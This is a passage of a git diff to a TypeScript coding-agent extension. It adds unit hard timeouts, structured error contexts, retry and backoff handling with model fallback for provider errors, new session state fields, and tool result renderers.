     const sessionPromise = s.cmdCtx!.newSession().finally(() => {
-      _setSessionSwitchInFlight(false);
+      if (sessionSwitchGeneration === mySessionSwitchGeneration) {
+        _setSessionSwitchInFlight(false);
+      }
     });
     const timeoutPromise = new Promise<{ cancelled: true }>((resolve) => {
       sessionTimeoutHandle = setTimeout(
@@ -57,19 +66,29 @@ export async function runUnit(
       unitId,
       error: msg,
     });
-    return { status: "cancelled" };
+    return { status: "cancelled", errorContext: { message: `Session creation failed: ${msg}`, category: "session-failed", isTransient: true } };
   }
   if (sessionTimeoutHandle) clearTimeout(sessionTimeoutHandle);
 
   if (sessionResult.cancelled) {
     debugLog("runUnit-session-timeout", { unitType, unitId });
-    return { status: "cancelled" };
+    return { status: "cancelled", errorContext: { message: "Session creation timed out", category: "timeout", isTransient: true } };
   }
 
   if (!s.active) {
     return { status: "cancelled" };
   }
 
+  if (s.currentUnitModel && typeof pi.setModel === "function") {
+    const restored = await pi.setModel(s.currentUnitModel, { persist: false });
+    if (!restored) {
+      ctx.ui.notify(
+        `Failed to restore ${s.currentUnitModel.provider}/${s.currentUnitModel.id} after session creation. Using session default.`,
+        "warning",
+      );
+    }
+  }
+
   // ── Create the agent_end promise (per-unit one-shot) ──
   // This happens after newSession completes so session-switch agent_end events
   // from the previous session cannot resolve the new unit.
@@ -85,7 +104,9 @@ export async function runUnit(
     if (process.cwd() !== s.basePath) {
       process.chdir(s.basePath);
     }
-  } catch { /* non-fatal — chdir may fail if dir was removed */ }
+  } catch (e) {
+    logWarning("engine", "Failed to chdir to basePath before dispatch", { basePath: s.basePath, error: String(e) });
+  }
 
   // ── Send the prompt ──
   debugLog("runUnit", { phase: "send-message", unitType, unitId });
@@ -95,9 +116,23 @@ export async function runUnit(
     { triggerTurn: true },
   );
 
-  // ── Await agent_end ──
+  // ── Await agent_end with absolute timeout (H4 fix) ──
+  // If supervision fails to resolve unitPromise within 30s, treat as cancelled.
+  // Without this, a crashed agent that never emits agent_end hangs the loop (#3161).
   debugLog("runUnit", { phase: "awaiting-agent-end", unitType, unitId });
-  const result = await unitPromise;
+  const supervisor = resolveAutoSupervisorConfig();
+  const UNIT_HARD_TIMEOUT_MS = Math.max(
+    30_000,
+    ((supervisor.hard_timeout_minutes ?? 30) * 60 * 1000) + 30_000,
+  );
+  let unitTimeoutHandle: ReturnType<typeof setTimeout> | undefined;
+  const timeoutResult = new Promise<UnitResult>((resolve) => {
+    unitTimeoutHandle = setTimeout(() => {
+      resolve({ status: "cancelled", errorContext: { message: "Unit hard timeout — supervision may have failed", category: "timeout", isTransient: true } });
+    }, UNIT_HARD_TIMEOUT_MS);
+  });
+  const result = await Promise.race([unitPromise, timeoutResult]);
+  if (unitTimeoutHandle) clearTimeout(unitTimeoutHandle);
   debugLog("runUnit", {
     phase: "agent-end-received",
     unitType,
@@ -115,8 +150,8 @@ export async function runUnit(
     if (typeof cmdCtxAny?.clearQueue === "function") {
       (cmdCtxAny.clearQueue as () => unknown)();
     }
-  } catch {
-    // Non-fatal — clearQueue may not be available in all contexts
+  } catch (e) {
+    logWarning("engine", "clearQueue failed after unit completion", { error: String(e) });
   }
 
   return result;
diff --git a/src/resources/extensions/gsd/auto/session.ts b/src/resources/extensions/gsd/auto/session.ts
index b559645c9..021efd285 100644
--- a/src/resources/extensions/gsd/auto/session.ts
+++ b/src/resources/extensions/gsd/auto/session.ts
@@ -16,6 +16,7 @@
  * `let` or `var` declarations.
  */
 
+import type { Api, Model } from "@gsd/pi-ai";
 import type { ExtensionCommandContext } from "@gsd/pi-coding-agent";
 import type { GitServiceImpl } from "../git-service.js";
 import type { CaptureEntry } from "../captures.js";
@@ -23,13 +24,6 @@ import type { BudgetAlertLevel } from "../auto-budget.js";
 
 // ─── Exported Types ──────────────────────────────────────────────────────────
 
-export interface CompletedUnit {
-  type: string;
-  id: string;
-  startedAt: number;
-  finishedAt: number;
-}
-
 export interface CurrentUnit {
   type: string;
   id: string;
@@ -73,7 +67,7 @@ export interface SidecarItem {
 export const MAX_UNIT_DISPATCHES = 3;
 export const STUB_RECOVERY_THRESHOLD = 2;
 export const MAX_LIFETIME_DISPATCHES = 6;
-export const NEW_SESSION_TIMEOUT_MS = 30_000;
+export const NEW_SESSION_TIMEOUT_MS = 120_000;
 
 // ─── AutoSession ─────────────────────────────────────────────────────────────
 
@@ -106,11 +100,13 @@ export class AutoSession {
   // ── Current unit ─────────────────────────────────────────────────────────
   currentUnit: CurrentUnit | null = null;
   currentUnitRouting: UnitRouting | null = null;
-  completedUnits: CompletedUnit[] = [];
   currentMilestoneId: string | null = null;
 
   // ── Model state ──────────────────────────────────────────────────────────
   autoModeStartModel: StartModel | null = null;
+  currentUnitModel: Model<Api> | null = null;
+  /** Fully-qualified model ID (provider/id) set after selectAndApplyModel + hook overrides (#2899). */
+  currentDispatchedModelId: string | null = null;
   originalModelId: string | null = null;
   originalModelProvider: string | null = null;
   lastBudgetAlertLevel: BudgetAlertLevel = 0;
@@ -128,8 +124,25 @@ export class AutoSession {
   // ── Sidecar queue ─────────────────────────────────────────────────────
   sidecarQueue: SidecarItem[] = [];
 
+  // ── Tool invocation errors (#2883) ──────────────────────────────────
+  /** Set when a GSD tool execution ends with isError due to malformed/truncated
+   *  JSON arguments. Checked by postUnitPreVerification to break retry loops. */
+  lastToolInvocationError: string | null = null;
+
+  // ── Isolation degradation ────────────────────────────────────────────
+  /** Set to true when worktree creation fails; prevents merge of nonexistent branch. */
+  isolationDegraded = false;
+
+  // ── Merge guard ──────────────────────────────────────────────────────
+  /** Set to true after phases.ts successfully calls mergeAndExit, so that
+   *  stopAuto does not attempt the same merge a second time (#2645). */
+  milestoneMergedInPhases = false;
+
   // ── Dispatch circuit breakers ──────────────────────────────────────
   rewriteAttemptCount = 0;
+  /** Tracks consecutive bootstrap attempts that found phase === "complete".
+   *  Moved from module-level to per-session so s.reset() clears it (#1348). */
+  consecutiveCompleteBootstraps = 0;
 
   // ── Metrics ──────────────────────────────────────────────────────────────
   autoStartTime = 0;
@@ -137,6 +150,10 @@ export class AutoSession {
   lastBaselineCharCount: number | undefined;
   pendingQuickTasks: CaptureEntry[] = [];
 
+  // ── Safety harness ───────────────────────────────────────────────────────
+  /** SHA of the pre-unit git checkpoint ref. Cleared on success or rollback. */
+  checkpointSha: string | null = null;
+
   // ── Signal handler ───────────────────────────────────────────────────────
   sigtermHandler: (() => void) | null = null;
 
@@ -162,14 +179,6 @@ export class AutoSession {
     return this.originalBasePath || this.basePath;
   }
 
-  completeCurrentUnit(): CompletedUnit | null {
-    if (!this.currentUnit) return null;
-    const done: CompletedUnit = { ...this.currentUnit, finishedAt: Date.now() };
-    this.completedUnits.push(done);
-    this.currentUnit = null;
-    return done;
-  }
-
   reset(): void {
     this.clearTimers();
 
@@ -195,11 +204,12 @@ export class AutoSession {
     // Unit
     this.currentUnit = null;
     this.currentUnitRouting = null;
-    this.completedUnits = [];
     this.currentMilestoneId = null;
 
     // Model
     this.autoModeStartModel = null;
+    this.currentUnitModel = null;
+    this.currentDispatchedModelId = null;
     this.originalModelId = null;
     this.originalModelProvider = null;
     this.lastBudgetAlertLevel = 0;
@@ -221,6 +231,11 @@ export class AutoSession {
     this.pendingQuickTasks = [];
     this.sidecarQueue = [];
     this.rewriteAttemptCount = 0;
+    this.consecutiveCompleteBootstraps = 0;
+    this.lastToolInvocationError = null;
+    this.isolationDegraded = false;
+    this.milestoneMergedInPhases = false;
+    this.checkpointSha = null;
 
     // Signal handler
     this.sigtermHandler = null;
@@ -238,7 +253,6 @@ export class AutoSession {
       activeRunDir: this.activeRunDir,
       currentMilestoneId: this.currentMilestoneId,
       currentUnit: this.currentUnit,
-      completedUnits: this.completedUnits.length,
       unitDispatchCount: Object.fromEntries(this.unitDispatchCount),
     };
   }
diff --git a/src/resources/extensions/gsd/auto/types.ts b/src/resources/extensions/gsd/auto/types.ts
index 748d5a1c7..9c2d1d466 100644
--- a/src/resources/extensions/gsd/auto/types.ts
+++ b/src/resources/extensions/gsd/auto/types.ts
@@ -47,12 +47,25 @@ export interface AgentEndEvent {
   messages: unknown[];
 }
 
+/**
+ * Structured error context attached to a UnitResult when the unit ends
+ * due to an infrastructure or timeout error (not user-driven cancellation).
+ */
+export interface ErrorContext {
+  message: string;
+  category: "provider" | "timeout" | "idle" | "network" | "aborted" | "session-failed" | "unknown";
+  stopReason?: string;
+  isTransient?: boolean;
+  retryAfterMs?: number;
+}
+
 /**
  * Result of a single unit execution (one iteration of the loop).
  */
 export interface UnitResult {
   status: "completed" | "cancelled" | "error";
   event?: AgentEndEvent;
+  errorContext?: ErrorContext;
 }
 
 // ─── Phase pipeline types ────────────────────────────────────────────────────
@@ -78,8 +91,13 @@ export interface IterationContext {
 export interface LoopState {
   recentUnits: Array<{ key: string; error?: string }>;
   stuckRecoveryAttempts: number;
+  /** Consecutive finalize timeout count — stops auto-mode after threshold. */
+  consecutiveFinalizeTimeouts: number;
 }
 
+/** Max consecutive finalize timeouts before hard-stopping auto-mode. */
+export const MAX_FINALIZE_TIMEOUTS = 3;
+
 export interface PreDispatchData {
   state: GSDState;
   mid: string;
@@ -92,7 +110,6 @@ export interface IterationData {
   prompt: string;
   finalPrompt: string;
   pauseAfterUatDispatch: boolean;
-  observabilityIssues: unknown[];
   state: GSDState;
   mid: string | undefined;
   midTitle: string | undefined;
diff --git a/src/resources/extensions/gsd/bootstrap/agent-end-recovery.ts b/src/resources/extensions/gsd/bootstrap/agent-end-recovery.ts
index e9c018101..553df4e65 100644
--- a/src/resources/extensions/gsd/bootstrap/agent-end-recovery.ts
+++ b/src/resources/extensions/gsd/bootstrap/agent-end-recovery.ts
@@ -1,15 +1,69 @@
 import type { ExtensionAPI, ExtensionContext } from "@gsd/pi-coding-agent";
 
+import { logWarning } from "../workflow-logger.js";
 import { checkAutoStartAfterDiscuss } from "../guided-flow.js";
 import { getAutoDashboardData, getAutoModeStartModel, isAutoActive, pauseAuto } from "../auto.js";
-import { getNextFallbackModel, isTransientNetworkError, resolveModelWithFallbacksForUnit } from "../preferences.js";
-import { classifyProviderError, pauseAutoForProviderError } from "../provider-error-pause.js";
+import { getNextFallbackModel, resolveModelWithFallbacksForUnit } from "../preferences.js";
+import { pauseAutoForProviderError } from "../provider-error-pause.js";
 import { isSessionSwitchInFlight, resolveAgentEnd } from "../auto-loop.js";
+import { resolveModelId } from "../auto-model-selection.js";
 import { clearDiscussionFlowState } from "./write-gate.js";
+import { resumeAutoAfterProviderDelay } from "./provider-error-resume.js";
+import {
+  classifyError,
+  createRetryState,
+  resetRetryState,
+  isTransient,
+  type ErrorClass,
+} from "../error-classifier.js";
 
-const networkRetryCounters = new Map<string, number>();
-const MAX_TRANSIENT_AUTO_RESUMES = 3;
-let consecutiveTransientErrors = 0;
+const retryState = createRetryState();
+const MAX_NETWORK_RETRIES = 2;
+const MAX_TRANSIENT_AUTO_RESUMES = 8;
+
+/**
+ * Reset the module-level retry state so a resumed auto-session starts fresh.
+ * Called by provider-error-resume.ts before startAuto() — without this, the
+ * consecutiveTransientCount accumulates across pause/resume cycles and locks
+ * out auto-resume after MAX_TRANSIENT_AUTO_RESUMES total (not consecutive) errors.
+ */
+export function resetTransientRetryState(): void {
+  resetRetryState(retryState);
+}
+
+async function pauseTransientWithBackoff(
+  cls: ErrorClass,
+  pi: ExtensionAPI,
+  ctx: ExtensionContext,
+  errorDetail: string,
+  isRateLimit: boolean,
+): Promise<void> {
+  retryState.consecutiveTransientCount += 1;
+  const baseRetryAfterMs = "retryAfterMs" in cls ? cls.retryAfterMs : 15_000;
+  const retryAfterMs = baseRetryAfterMs * 2 ** Math.max(0, retryState.consecutiveTransientCount - 1);
+  const allowAutoResume = retryState.consecutiveTransientCount <= MAX_TRANSIENT_AUTO_RESUMES;
+  if (!allowAutoResume) {
+    ctx.ui.notify(`Transient provider errors persisted after ${MAX_TRANSIENT_AUTO_RESUMES} auto-resume attempts. Pausing for manual review.`, "warning");
+  }
+  await pauseAutoForProviderError(ctx.ui, errorDetail, () => pauseAuto(ctx, pi, {
+    message: `Provider error: ${errorDetail}`,
+    category: "provider",
+    isTransient: allowAutoResume,
+    retryAfterMs,
+  }), {
+    isRateLimit,
+    isTransient: allowAutoResume,
+    retryAfterMs,
+    resume: allowAutoResume
+      ? () => {
+        void resumeAutoAfterProviderDelay(pi, ctx).catch((err) => {
+          const message = err instanceof Error ? err.message : String(err);
+          ctx.ui.notify(`Provider error recovery delay elapsed, but auto-mode failed to resume: ${message}`, "error");
+        });
+      }
+      : undefined,
+  });
+}
 
 export async function handleAgentEnd(
   pi: ExtensionAPI,
@@ -25,23 +79,98 @@ export async function handleAgentEnd(
 
   const lastMsg = event.messages[event.messages.length - 1];
   if (lastMsg && "stopReason" in lastMsg && lastMsg.stopReason === "aborted") {
+    // Empty content with aborted stopReason is a non-fatal agent stop (the LLM
+    // chose to end without producing output). Only pause on genuine fatal aborts
+    // that carry error context — e.g. errorMessage field or non-empty content
+    // indicating a mid-stream failure. (#2695)
+    const content = "content" in lastMsg ? lastMsg.content : undefined;
+    const hasEmptyContent = Array.isArray(content) && content.length === 0;
+    const hasErrorMessage = "errorMessage" in lastMsg && !!lastMsg.errorMessage;
+
+    if (hasEmptyContent && !hasErrorMessage) {
+      // Non-fatal: treat as a normal agent end so the loop can continue
+      // instead of entering a stuck re-dispatch cycle.
+      try {
+        resetRetryState(retryState);
+        resolveAgentEnd(event);
+      } catch (err) {
+        const message = err instanceof Error ? err.message : String(err);
+        ctx.ui.notify(`Auto-mode error after empty-content abort: ${message}. Stopping auto-mode.`, "error");
+        try { await pauseAuto(ctx, pi); } catch (e) { logWarning("bootstrap", `pauseAuto failed after empty-content abort: ${(e as Error).message}`); }
+      }
+      return;
+    }
+
     await pauseAuto(ctx, pi);
     return;
   }
   if (lastMsg && "stopReason" in lastMsg && lastMsg.stopReason === "error") {
-    const errorDetail = "errorMessage" in lastMsg && lastMsg.errorMessage ? `: ${lastMsg.errorMessage}` : "";
-    const errorMsg = ("errorMessage" in lastMsg && lastMsg.errorMessage) ? String(lastMsg.errorMessage) : "";
+    // #3588: errorMessage can be useless (e.g. "success") while the real error
+    // is in the assistant message text content. Fall back to content when
+    // errorMessage looks uninformative.
+    const rawErrorMsg = ("errorMessage" in lastMsg && lastMsg.errorMessage) ? String(lastMsg.errorMessage) : "";
+    const isUseless = !rawErrorMsg || /^(success|ok|true|error|unknown)$/i.test(rawErrorMsg.trim());
+    // #3588: When errorMessage is uninformative, extract the real error from
+    // the assistant message text content for display purposes only.
+    // Classification still uses rawErrorMsg to avoid false positives from prose.
+    let displayMsg = rawErrorMsg;
+    if (isUseless && "content" in lastMsg && Array.isArray(lastMsg.content)) {
+      const textBlock = lastMsg.content.find((b: any) => b.type === "text" && b.text);
+      if (textBlock) displayMsg = (textBlock as any).text.slice(0, 300);
+    }
+    const errorDetail = displayMsg ? `: ${displayMsg}` : "";
+    const explicitRetryAfterMs = ("retryAfterMs" in lastMsg && typeof lastMsg.retryAfterMs === "number") ? lastMsg.retryAfterMs : undefined;
 
-    if (isTransientNetworkError(errorMsg)) {
+    // ── 1. Classify using rawErrorMsg to avoid prose false-positives ────
+    const cls = classifyError(rawErrorMsg, explicitRetryAfterMs);
+
+    // ── 1b. Defer to Core RetryHandler for transient errors ─────────────
+    // The Core RetryHandler (agent-session.ts) processes retryable errors
+    // AFTER this extension handler, in the same _processAgentEvent() call.
+    // For transient errors (overloaded, rate limit, server), the Core will
+    // retry in-context — same session, same conversation — which is strictly
+    // better than our Layer 2 pause+resume (which creates a new session).
+    //
+    // If we react here AND the Core also retries, we race: pauseAuto tears
+    // down the session while agent.continue() starts a new turn.
+    //
+    // Solution: Do nothing for transient errors. The Core RetryHandler
+    // runs next in _processAgentEvent and will either:
+    //   a) Retry successfully → new agent_end (success) → we see it next time
+    //   b) Exhaust retries → the agent stays idle, autoLoop's unit timeout
+    //      or stuck detection handles it
+    //
+    // We do NOT call resolveAgentEnd here — that would unblock autoLoop
+    // prematurely while the Core is still retrying in the same session.
+    // We do NOT call pauseAuto — that would tear down the session.
+    if (isTransient(cls)) {
+      return;
+    }
+
+    // Cap rate-limit backoff for CLI-style providers (openai-codex, google-gemini-cli)
+    // which use per-user quotas with shorter windows (#2922).
+    if (cls.kind === "rate-limit") {
+      const currentProvider = ctx.model?.provider;
+      if (currentProvider === "openai-codex" || currentProvider === "google-gemini-cli") {
+        cls.retryAfterMs = Math.min(cls.retryAfterMs, 30_000);
+      }
+    }
+
+    // ── 2. Decide & Act ──────────────────────────────────────────────────
+
+    // --- Network errors: same-model retry with backoff ---
+    if (cls.kind === "network") {
       const currentModelId = ctx.model?.id ?? "unknown";
-      const retryKey = `network-retry:${currentModelId}`;
-      const currentRetries = networkRetryCounters.get(retryKey) ?? 0;
-      const maxRetries = 2;
-      if (currentRetries < maxRetries) {
-        networkRetryCounters.set(retryKey, currentRetries + 1);
-        const attempt = currentRetries + 1;
-        const delayMs = attempt * 3000;
-        ctx.ui.notify(`Network error on ${currentModelId}${errorDetail}. Retry ${attempt}/${maxRetries} in ${delayMs / 1000}s...`, "warning");
+      if (retryState.currentRetryModelId !== currentModelId) {
+        retryState.networkRetryCount = 0;
+        retryState.currentRetryModelId = currentModelId;
+      }
+      if (retryState.networkRetryCount < MAX_NETWORK_RETRIES) {
+        retryState.networkRetryCount += 1;
+        retryState.consecutiveTransientCount += 1;
+        const attempt = retryState.networkRetryCount;
+        const delayMs = attempt * cls.retryAfterMs;
+        ctx.ui.notify(`Network error on ${currentModelId}${errorDetail}. Retry ${attempt}/${MAX_NETWORK_RETRIES} in ${delayMs / 1000}s...`, "warning");
         setTimeout(() => {
           pi.sendMessage(
             { customType: "gsd-auto-timeout-recovery", content: "Continue execution — retrying after transient network error.", display: false },
@@ -50,26 +179,49 @@ export async function handleAgentEnd(
         }, delayMs);
         return;
       }
-      networkRetryCounters.delete(retryKey);
+      // Network retries exhausted — fall through to model fallback
+      retryState.networkRetryCount = 0;
+      retryState.currentRetryModelId = undefined;
       ctx.ui.notify(`Network retries exhausted for ${currentModelId}. Attempting model fallback.`, "warning");
     }
 
-    const dash = getAutoDashboardData();
-    if (dash.currentUnit) {
-      const modelConfig = resolveModelWithFallbacksForUnit(dash.currentUnit.type);
-      if (modelConfig && modelConfig.fallbacks.length > 0) {
-        const availableModels = ctx.modelRegistry.getAvailable();
-        const nextModelId = getNextFallbackModel(ctx.model?.id, modelConfig);
-        if (nextModelId) {
-          networkRetryCounters.clear();
-          const slashIdx = nextModelId.indexOf("/");
-          const modelToSet = slashIdx !== -1
-            ? availableModels.find((m) => m.provider.toLowerCase() === nextModelId.substring(0, slashIdx).toLowerCase() && m.id.toLowerCase() === nextModelId.substring(slashIdx + 1).toLowerCase())
-            : (availableModels.find((m) => m.id === nextModelId && m.provider === ctx.model?.provider) ?? availableModels.find((m) => m.id === nextModelId));
-          if (modelToSet) {
-            const ok = await pi.setModel(modelToSet, { persist: false });
+    // --- Transient errors: try model fallback first, then pause ---
+    // Rate limits are often per-model, so switching models can bypass them.
+    if (cls.kind === "rate-limit" || cls.kind === "network" || cls.kind === "server" || cls.kind === "connection" || cls.kind === "stream") {
+      // Try model fallback
+      const dash = getAutoDashboardData();
+      if (dash.currentUnit) {
+        const modelConfig = resolveModelWithFallbacksForUnit(dash.currentUnit.type);
+        if (modelConfig && modelConfig.fallbacks.length > 0) {
+          const availableModels = ctx.modelRegistry.getAvailable();
+          const nextModelId = getNextFallbackModel(ctx.model?.id, modelConfig);
+          if (nextModelId) {
+            retryState.networkRetryCount = 0;
+            retryState.currentRetryModelId = undefined;
+            const modelToSet = resolveModelId(nextModelId, availableModels, ctx.model?.provider);
+            if (modelToSet) {
+              const ok = await pi.setModel(modelToSet, { persist: false });
+              if (ok) {
+                ctx.ui.notify(`Model error${errorDetail}. Switched to fallback: ${nextModelId} and resuming.`, "warning");
+                pi.sendMessage({ customType: "gsd-auto-timeout-recovery", content: "Continue execution.", display: false }, { triggerTurn: true });
+                return;
+              }
+            }
+          }
+        }
+      }
+
+      // Try restoring session model
+      const sessionModel = getAutoModeStartModel();
+      if (sessionModel) {
+        if (ctx.model?.id !== sessionModel.id || ctx.model?.provider !== sessionModel.provider) {
+          const startModel = ctx.modelRegistry.getAvailable().find((m) => m.provider === sessionModel.provider && m.id === sessionModel.id);
+          if (startModel) {
+            const ok = await pi.setModel(startModel, { persist: false });
             if (ok) {
-              ctx.ui.notify(`Model error${errorDetail}. Switched to fallback: ${nextModelId} and resuming.`, "warning");
+              retryState.networkRetryCount = 0;
+              retryState.currentRetryModelId = undefined;
+              ctx.ui.notify(`Model error${errorDetail}. Restored session model: ${sessionModel.provider}/${sessionModel.id} and resuming.`, "warning");
               pi.sendMessage({ customType: "gsd-auto-timeout-recovery", content: "Continue execution.", display: false }, { triggerTurn: true });
               return;
             }
@@ -78,65 +230,36 @@ export async function handleAgentEnd(
       }
     }
 
-    const sessionModel = getAutoModeStartModel();
-    if (sessionModel) {
-      if (ctx.model?.id !== sessionModel.id || ctx.model?.provider !== sessionModel.provider) {
-        const startModel = ctx.modelRegistry.getAvailable().find((m) => m.provider === sessionModel.provider && m.id === sessionModel.id);
-        if (startModel) {
-          const ok = await pi.setModel(startModel, { persist: false });
-          if (ok) {
-            networkRetryCounters.clear();
-            ctx.ui.notify(`Model error${errorDetail}. Restored session model: ${sessionModel.provider}/${sessionModel.id} and resuming.`, "warning");
-            pi.sendMessage({ customType: "gsd-auto-timeout-recovery", content: "Continue execution.", display: false }, { triggerTurn: true });
-            return;
-          }
-        }
-      }
+    // --- Transient fallback: pause with auto-resume ---
+    if (isTransient(cls)) {
+      await pauseTransientWithBackoff(cls, pi, ctx, errorDetail, cls.kind === "rate-limit");
+      return;
     }
 
-    const classification = classifyProviderError(errorMsg);
-    const explicitRetryAfterMs = ("retryAfterMs" in lastMsg && typeof lastMsg.retryAfterMs === "number") ? lastMsg.retryAfterMs : undefined;
-    if (classification.isTransient) {
-      consecutiveTransientErrors += 1;
-    } else {
-      consecutiveTransientErrors = 0;
-    }
-    const baseRetryAfterMs = explicitRetryAfterMs ?? classification.suggestedDelayMs;
-    const retryAfterMs = classification.isTransient
-      ? baseRetryAfterMs * 2 ** Math.max(0, consecutiveTransientErrors - 1)
-      : baseRetryAfterMs;
-    const allowAutoResume = classification.isTransient && consecutiveTransientErrors <= MAX_TRANSIENT_AUTO_RESUMES;
-    if (classification.isTransient && !allowAutoResume) {
-      ctx.ui.notify(`Transient provider errors persisted after ${MAX_TRANSIENT_AUTO_RESUMES} auto-resume attempts. Pausing for manual review.`, "warning");
-    }
-    await pauseAutoForProviderError(ctx.ui, errorDetail, () => pauseAuto(ctx, pi), {
-      isRateLimit: classification.isRateLimit,
-      isTransient: allowAutoResume,
-      retryAfterMs,
-      resume: allowAutoResume
-        ? () => {
-          pi.sendMessage(
-            { customType: "gsd-auto-timeout-recovery", content: "Continue execution — provider error recovery delay elapsed.", display: false },
-            { triggerTurn: true },
-          );
-        }
-        : undefined,
+    // --- Permanent / unknown: pause indefinitely ---
+    await pauseAutoForProviderError(ctx.ui, errorDetail, () => pauseAuto(ctx, pi, {
+      message: `Provider error: ${errorDetail}`,
+      category: "provider",
+      isTransient: false,
+    }), {
+      isRateLimit: false,
+      isTransient: false,
+      retryAfterMs: 0,
     });
     return;
   }
 
+  // ── Success path ─────────────────────────────────────────────────────────
   try {
-    consecutiveTransientErrors = 0;
-    networkRetryCounters.clear();
+    resetRetryState(retryState);
     resolveAgentEnd(event);
   } catch (err) {
     const message = err instanceof Error ? err.message : String(err);
     ctx.ui.notify(`Auto-mode error in agent_end handler: ${message}. Stopping auto-mode.`, "error");
     try {
       await pauseAuto(ctx, pi);
-    } catch {
-      // best-effort
+    } catch (e) {
+      logWarning("bootstrap", `pauseAuto failed in agent_end handler: ${(e as Error).message}`);
     }
   }
 }
-
diff --git a/src/resources/extensions/gsd/bootstrap/db-tools.ts b/src/resources/extensions/gsd/bootstrap/db-tools.ts
index d73401a14..18634c486 100644
--- a/src/resources/extensions/gsd/bootstrap/db-tools.ts
+++ b/src/resources/extensions/gsd/bootstrap/db-tools.ts
@@ -1,14 +1,28 @@
 import { Type } from "@sinclair/typebox";
 import type { ExtensionAPI } from "@gsd/pi-coding-agent";
+import { Text } from "@gsd/pi-tui";
 
 import { findMilestoneIds, nextMilestoneId, claimReservedId, getReservedMilestoneIds } from "../guided-flow.js";
 import { loadEffectiveGSDPreferences } from "../preferences.js";
 import { ensureDbOpen } from "./dynamic-tools.js";
+import { StringEnum } from "@gsd/pi-ai";
+import { logError } from "../workflow-logger.js";
+import { getErrorMessage } from "../error-utils.js";
+import { shouldBlockContextArtifactSave } from "./write-gate.js";
+
+const SUPPORTED_SUMMARY_ARTIFACT_TYPES = ["SUMMARY", "RESEARCH", "CONTEXT", "ASSESSMENT", "CONTEXT-DRAFT"] as const;
+
+export function isSupportedSummaryArtifactType(
+  artifactType: string,
+): artifactType is (typeof SUPPORTED_SUMMARY_ARTIFACT_TYPES)[number] {
+  return (SUPPORTED_SUMMARY_ARTIFACT_TYPES as readonly string[]).includes(artifactType);
+}
 
 /**
  * Register an alias tool that shares the same execute function as its canonical counterpart.
  * The alias description and promptGuidelines direct the LLM to prefer the canonical name.
  */
+// eslint-disable-next-line @typescript-eslint/no-explicit-any -- toolDef shape matches ToolDefinition but typing it fully requires generics
 function registerAlias(pi: ExtensionAPI, toolDef: any, aliasName: string, canonicalName: string): void {
   pi.registerTool({
     ...toolDef,
@@ -21,7 +35,7 @@ function registerAlias(pi: ExtensionAPI, toolDef: any, aliasName: string, canoni
 export function registerDbTools(pi: ExtensionAPI): void {
   // ─── gsd_decision_save (formerly gsd_save_decision) ─────────────────────
 
-  const decisionSaveExecute = async (_toolCallId: any, params: any, _signal: any, _onUpdate: any, _ctx: any) => {
+  const decisionSaveExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
     const dbAvailable = await ensureDbOpen();
     if (!dbAvailable) {
       return {
@@ -49,7 +63,7 @@ export function registerDbTools(pi: ExtensionAPI): void {
       };
     } catch (err) {
       const msg = err instanceof Error ? err.message : String(err);
-      process.stderr.write(`gsd-db: gsd_decision_save tool failed: ${msg}\n`);
+      logError("tool", `gsd_decision_save tool failed: ${msg}`, { tool: "gsd_decision_save", error: String(err) });
       return {
         content: [{ type: "text" as const, text: `Error saving decision: ${msg}` }],
         details: { operation: "save_decision", error: msg } as any,
@@ -85,6 +99,22 @@ export function registerDbTools(pi: ExtensionAPI): void {
       ], { description: "Who made this decision: 'human' (user directed), 'agent' (LLM decided autonomously), or 'collaborative' (discussed and agreed). Default: 'agent'" })),
     }),
     execute: decisionSaveExecute,
+    renderCall(args: any, theme: any) {
+      let text = theme.fg("toolTitle", theme.bold("decision_save "));
+      if (args.scope) text += theme.fg("accent", `[${args.scope}] `);
+      if (args.decision) text += theme.fg("muted", args.decision);
+      if (args.choice) text += theme.fg("dim", ` — ${args.choice}`);
+      return new Text(text, 0, 0);
+    },
+    renderResult(result: any, _options: any, theme: any) {
+      const d = result.details;
+      if (result.isError || d?.error) {
+        return new Text(theme.fg("error", `Error: ${d?.error ?? "unknown"}`), 0, 0);
+      }
+      let text = theme.fg("success", `Decision ${d?.id ?? ""} saved`);
+      if (d?.id) text += theme.fg("dim", ` → DECISIONS.md`);
+      return new Text(text, 0, 0);
+    },
   };
 
   pi.registerTool(decisionSaveTool);
@@ -92,7 +122,7 @@ export function registerDbTools(pi: ExtensionAPI): void {
 
   // ─── gsd_requirement_update (formerly gsd_update_requirement) ───────────
 
-  const requirementUpdateExecute = async (_toolCallId: any, params: any, _signal: any, _onUpdate: any, _ctx: any) => {
+  const requirementUpdateExecute = async (_toolCallId: string, params: any, _signal: AbortSignal | undefined, _onUpdate: unknown, _ctx: unknown) => {
     const dbAvailable = await ensureDbOpen();
     if (!dbAvailable) {
       return {
@@ -101,14 +131,6 @@ export function registerDbTools(pi: ExtensionAPI): void {
       };
     }
     try {
-      const db = await import("../gsd-db.js");
-      const existing = db.getRequirementById(params.id);
-      if (!existing) {
-        return {
-          content: [{ type: "text" as const, text: `Error: Requirement ${params.id} not found.` }],
-          details: { operation: "update_requirement", id: params.id, error: "not_found" } as any,
-        };
-      }
       const { updateRequirementInDb } = await import("../db-writer.js");
       const updates: Record<string, string | undefined> = {};
       if (params.status !== undefined) updates.status = params.status;
@@ -124,7 +146,7 @@ export function registerDbTools(pi: ExtensionAPI): void {
       };
     } catch (err) {
       const msg = err instanceof Error ? err.message : String(err);
-      process.stderr.write(`gsd-db: gsd_requirement_update tool failed: ${msg}\n`);
+      logError("tool", `gsd_requirement_update tool failed: ${msg}`, { tool: "gsd_requirement_update", error: String(err) });
       return {
         content: [{ type: "text" as const, text: `Error updating requirement: ${msg}` }],
         details: { operation: "update_requirement", id: params.id, error: msg } as any,
@@ -155,14 +177,115 @@ export function registerDbTools(pi: ExtensionAPI): void {
       supporting_slices: Type.Optional(Type.String({ description: "Supporting slices" })),
     }),
     execute: requirementUpdateExecute,
+    renderCall(args: any, theme: any) {
+      let text = theme.fg("toolTitle", theme.bold("requirement_update "));
+      if (args.id) text += theme.fg("accent", args.id);
+      const fields = ["status", "validation", "notes", "description"].filter((f) => args[f]);
+      if (fields.length > 0) text += theme.fg("dim", ` (${fields.join(", ")})`);
+      return new Text(text, 0, 0);
+    },
+    renderResult(result: any, _options: any, theme: any) {
+      const d = result.details;
+      if (result.isError || d?.error) {
+        return new Text(theme.fg("error", `Error: ${d?.error ?? "unknown"}`), 0, 0);
+      }
+      let text = theme.fg("success", `Requirement ${d?.id ?? ""} updated`);
